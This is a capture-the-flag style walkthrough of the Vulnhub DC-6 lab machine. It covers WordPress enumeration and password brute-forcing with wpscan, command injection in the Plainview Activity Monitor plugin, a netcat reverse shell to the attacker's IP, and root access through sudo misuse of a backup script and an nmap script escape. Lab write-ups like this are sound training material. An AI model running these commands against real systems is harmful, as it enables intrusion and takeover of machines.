DC: 6 is a Vulnhub machine that can be found at https://www.vulnhub.com/entry/dc-6,315/ and the exploitation process consists in discovering a WordPress site to then enumerate it to obtain usernames that can be used to brute-force a password. A low privilege shell is obtained by exploiting a vulnerability in the Plainview activity monitor plugin to get RCE via code injection. To get root privileges we would simply check for what we are allowed to execute as sudo with two different users.
Scanning and Enumeration
Starting out with a full TCP scan on nmap reveals two open ports with one being an SSH service and the other one being an HTTP service.
If we try to browse to the HTTP server it will take a few seconds before we get a “server not found” error and if we look at the URL it seems like we are being redirected to a hostname instead of an IP address with the hostname being wordy.
Since the HTTP service is trying to use a hostname to access the web server I’ll add the hostname and the IP address to my hosts file in /etc/hosts with a text editor.
After saving the changes, if we go back to our browser and navigate to http://wordy we will now be able to see what it seems to be a wordpress site.
Browsing to the wp-login.php file displays a WordPress login page.
Now that I got a login page and know that WordPress is running on this web server I will use wpscan to to see if a can enumerate some information. This is the command I used to execute WordPress (the -e switch is used to enumerate).
wpscan --url http://wordy/ -e
I also browsed the other directories that were found by gobuster to see if there were any credentials, specifically passwords since I had already some usernames, but I couldn’t find anything else there. I then also thought that brute-forcing the passwords would be a good idea but using a wordlist like rockyou.txt would take too much time to brute-force, specially if I’m dealing with 4 usernames. Luckily the author of this machine provided us a smaller list of passwords by taking the rockyou.txt file and using only a part of the list. This is the command used to get a shorter password list.
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
I then also created a file called usernames containing the usernames I found (sarah,mark,jens) and used wpscan again to brute-force the password, this is the command I used:
wpscan --url http://wordy -U /home/someuser/usernames -P /home/someuser/passwords.txt
In about 5 minutes it was able to determine mark’s password and it was also the only user that was able to brute-force a password from.
When logged in wit those credentials, I was able to find out the roles of each user and the WordPress version running as highlighted at the bottom.
By looking around for exploits I couldn’t find anything relevant to the for the WordPress version running so I kept looking around and noticed an “Activity Monitor” option at the left side below the Tools option and thought it will probably be worth to check what it was.
While I was looking for vulnerabilities in Plainview-activity-monitor for the version 20161228 I was able to come across the following POC:
From here using burp seemed like a good option, so I set up burp to intercept my request when entering an IP address and clicking on Lookup. This is how the request looks on burp:
Looking at the response from the server and scrolling down almost to the end I was able to successfully prove command execution.
To get a reverse shell I used netcat on the target machine to connect back to my attacking machine on port 443 I used used netcat which happened to be available in the target machine. This is the command I used to get a reverse shell:
nc -e /bin/sh 192.168.80.129 443
I was able to successfully get a reverse shell as the www-data user.
Since the SSH service was open, I tried to SSH as the graham user and was able to successfully log in.
Elevating privileges was very straightforward as issuing the command “sudo -l” shows that the user can sudo as the user “jens” to execute a backups.sh file.
Navigating to the location of the file I noticed that the user graham can modify the file as it belongs to the devs group.
#!/bin/bash /bin/bash -i
TF=$(mktemp) echo 'os.execute("/bin/bash")' > $TF sudo nmap --script=$TF